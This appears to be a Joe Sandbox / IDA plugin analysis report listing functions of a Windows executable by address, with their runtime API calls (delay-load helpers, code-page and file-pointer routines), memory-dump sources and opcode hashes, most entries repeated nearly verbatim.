                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 2cc0c111ef8e2895b1d4ab80adbd28845d7ea1aedac8cd422593d42d79059708
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 13ae6d30de0b0bc55bcaeb2cbebdd5d0fb99ee929cd14575f0d5f813df1b4c5b
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 13ae6d30de0b0bc55bcaeb2cbebdd5d0fb99ee929cd14575f0d5f813df1b4c5b
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: fe6a350db972c5f31ddc9fd68d4ecc2bc9a6cd6e85fc18ef241c0b2940bce81b
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: fe6a350db972c5f31ddc9fd68d4ecc2bc9a6cd6e85fc18ef241c0b2940bce81b
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: a51413f41b09a26045b99097b49965d292ea0fe13e57e33686502994f214794a
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: a51413f41b09a26045b99097b49965d292ea0fe13e57e33686502994f214794a
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 5483088507185f15be97ff63b31cdda2142d2e5aea6bac13f0b2106c73e645f5
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 5483088507185f15be97ff63b31cdda2142d2e5aea6bac13f0b2106c73e645f5
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 4be6d98280aca0789c527dd85bcb7a7f2122ea2f3f3d80ec2517d16cc2c7d94a
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 4be6d98280aca0789c527dd85bcb7a7f2122ea2f3f3d80ec2517d16cc2c7d94a
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: dcd981436b7d1be86fd858314ca72fd3fbc6dc872e16a209b5b5427a20d7e52c
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: dcd981436b7d1be86fd858314ca72fd3fbc6dc872e16a209b5b5427a20d7e52c
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 3bd7a4c133b989ce6d97dc8b55a109c19353d96d9f64d9e483b369a08770f606
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 3bd7a4c133b989ce6d97dc8b55a109c19353d96d9f64d9e483b369a08770f606
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: PDGu<F
                                                                  • API String ID: 1269201914-164939742
                                                                  • Opcode ID: 31d04bd345d9370b59a2734bb8ab2583282417b6d35088926e4a0e63cd785988
                                                                  • Instruction ID: 47245416fdb997ead675b73ce127f2a47436c9c01d20b919addcb1b6211a2efd
                                                                  • Opcode Fuzzy Hash: 31d04bd345d9370b59a2734bb8ab2583282417b6d35088926e4a0e63cd785988
                                                                  • Instruction Fuzzy Hash: 4BA011CA2A8002BC30083283AC02C3F028CC0C2F28330882FF802820C0B8880C02083B
                                                                  Function 0046E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: PDGu<F
                                                                  • API String ID: 1269201914-164939742
                                                                  • Opcode ID: c0a2abc5d061e21602c6a63f10f8c5662dc10830f55eff0108d8b728904097e6
                                                                  • Instruction ID: 47245416fdb997ead675b73ce127f2a47436c9c01d20b919addcb1b6211a2efd
                                                                  • Opcode Fuzzy Hash: c0a2abc5d061e21602c6a63f10f8c5662dc10830f55eff0108d8b728904097e6
                                                                  • Instruction Fuzzy Hash: 4BA011CA2A8002BC30083283AC02C3F028CC0C2F28330882FF802820C0B8880C02083B
                                                                  Function 0046E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: PDGu<F
                                                                  • API String ID: 1269201914-164939742
                                                                  • Opcode ID: eb6a41e5ec7186d32765fb1b97747952922e91fcc6546a2f6d3af56488ffea54
                                                                  • Instruction ID: 47245416fdb997ead675b73ce127f2a47436c9c01d20b919addcb1b6211a2efd
                                                                  • Opcode Fuzzy Hash: eb6a41e5ec7186d32765fb1b97747952922e91fcc6546a2f6d3af56488ffea54
                                                                  • Instruction Fuzzy Hash: 4BA011CA2A8002BC30083283AC02C3F028CC0C2F28330882FF802820C0B8880C02083B
                                                                  Function 0046E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: PDGu<F
                                                                  • API String ID: 1269201914-164939742
                                                                  • Opcode ID: 9cf6fa8e1c15af4f3ed0ee05c2112d3f97b73c090e24d72effc960365058fa70
                                                                  • Instruction ID: 47245416fdb997ead675b73ce127f2a47436c9c01d20b919addcb1b6211a2efd
                                                                  • Opcode Fuzzy Hash: 9cf6fa8e1c15af4f3ed0ee05c2112d3f97b73c090e24d72effc960365058fa70
                                                                  • Instruction Fuzzy Hash: 4BA011CA2A8002BC30083283AC02C3F028CC0C2F28330882FF802820C0B8880C02083B
                                                                  Function 0047BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0047B7BB: GetOEMCP.KERNEL32(00000000,?,?,0047BA44,?), ref: 0047B7E6
                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0047BA89,?,00000000), ref: 0047BC64
                                                                  • GetCPInfo.KERNEL32(00000000,0047BA89,?,?,?,0047BA89,?,00000000), ref: 0047BC77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: CodeInfoPageValid
                                                                  • String ID:
                                                                  • API String ID: 546120528-0
                                                                  • Opcode ID: 43c6489877af0cd3ddcb82e0cc4f79a95fad2a288ccb400f6a5bbe0869bc4593
                                                                  • Instruction ID: 494c2c8812923be56c86a07d044dd3c022691c746887fd105ce51abc78d68909
                                                                  • Opcode Fuzzy Hash: 43c6489877af0cd3ddcb82e0cc4f79a95fad2a288ccb400f6a5bbe0869bc4593
                                                                  • Instruction Fuzzy Hash: 07511F709002059EDB258F76C8817FBBBA5EF41304F18C46FD49A8B252D73C99468BD9
                                                                  Function 00459A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00459A50,?,?,00000000,?,?,00458CBC,?), ref: 00459BAB
                                                                  • GetLastError.KERNEL32(?,00000000,00458411,-00009570,00000000,000007F3), ref: 00459BB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: 248818c1fadccd782f835514a8aa585d225dcd8dbb2172f24ccd346eebde085d
                                                                  • Instruction ID: 93bd81f00fb438e0d226445fc4f4be4a9a52d89e0be2d5b842f5133ee0283ccb
                                                                  • Opcode Fuzzy Hash: 248818c1fadccd782f835514a8aa585d225dcd8dbb2172f24ccd346eebde085d
                                                                  • Instruction Fuzzy Hash: 7E41CD30904341CBEB24DF15E58446BB7E5FBD5712F148A2EEC8183362E778BD098B59
                                                                  Function 00451E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00451E55
                                                                    • Part of subcall function 00453BBA: __EH_prolog.LIBCMT ref: 00453BBF
                                                                  • _wcslen.LIBCMT ref: 00451EFD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2838827086-0
                                                                  • Opcode ID: 7ecbe93e0df32804224e6873d210ea26aea7e05082c6d50f2cc8c2c4a8b6e342
                                                                  • Instruction ID: cc053990ec7634d5f0501a5c86a1d9aef9730bf0b6b1cb3c6652bea75c039455
                                                                  • Opcode Fuzzy Hash: 7ecbe93e0df32804224e6873d210ea26aea7e05082c6d50f2cc8c2c4a8b6e342
                                                                  • Instruction Fuzzy Hash: D8314B71904209AFCF11EF99C945AEEBBF5AF08305F10406EE845A7262D73A5E44CB69
                                                                  Function 00459DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004573BC,?,?,?,00000000), ref: 00459DBC
                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00459E70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
